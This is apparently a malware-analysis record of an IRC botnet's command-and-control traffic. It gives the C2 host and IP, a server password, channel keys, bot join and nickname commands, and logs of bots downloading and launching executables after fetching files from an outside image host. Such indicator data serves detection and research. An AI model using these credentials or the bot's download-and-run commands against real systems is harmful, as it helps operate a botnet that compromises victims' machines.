nice.niceshot.in (botnet hosted in the Netherlands, Rijndata B.V.)

Remote Host     Port Number
46.21.169.42    6567

PASS s1m0n3t4

MODE [SI|USA|00|P|57896] -ix
JOIN #yur# c1rc0dusoleil
PONG Apple.Network
NICK [SI|USA|00|P|57896]
USER XP-0495 * 0 :COMPUTERNAME

MODE [SI|USA|00|P|69385] -ix
JOIN #wal# c1rc0dusoleil
PRIVMSG #wal# :[Dl]: File download: 96.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_12581.exe @ 96.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|48857]
USER XP-5184 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|48857] -ix
JOIN #wel# c1rc0dusoleil
NICK [SI|USA|00|P|69385]
USER XP-6855 * 0 :COMPUTERNAME

UPDATE:
MODE [SI|USA|00|P|94601] -ix
JOIN #wul# c1rc0dusoleil
PONG Apple.Network
NICK [SI|USA|00|P|94601]
USER XP-1133 * 0 :COMPUTERNAME

UPDATE:
JOIN #update# c1rc0dusoleil
MODE [SI|USA|00|P|12877] -ix
PRIVMSG #update# :[Dl]: File download: 92.0KB to: C:\DOCUME~1\UserName\LOCALS~1\Temp\eraseme_83336.exe @ 92.0KB/sec.
QUIT [Update]: Updating to new bin.
NICK [SI|USA|00|P|59455]
USER XP-6072 * 0 :COMPUTERNAME
MODE [SI|USA|00|P|59455] -ix
NICK [SI|USA|00|P|12877]
JOIN #sut# c1rc0dusoleil
USER XP-1448 * 0 :COMPUTERNAME
NICK [SI|USA|00|P|03078]

The data identified by the following URLs was then requested from the remote web server:
http://img101.herosh.com/2011/04/18/919297453.gif
http://img102.herosh.com/2011/04/18/675075135.gif

UPDATE:
MODE [SI|USA|00|P|99411] -ix
JOIN #pat# c1rc0dusoleil
PRIVMSG #pat# :[Dl]: File download: 80.0KB to: c:\WINDOWS\yg.exe @ 80.0KB/sec.
PRIVMSG #pat# :[Dl]: Created process: "c:\WINDOWS\yg.exe", PID:
PONG Apple.Network
NICK [SI|USA|00|P|99411]
USER XP-0024 * 0 :COMPUTERNAME

Hosting information:
http://whois.domaintools.com/46.21.169.42
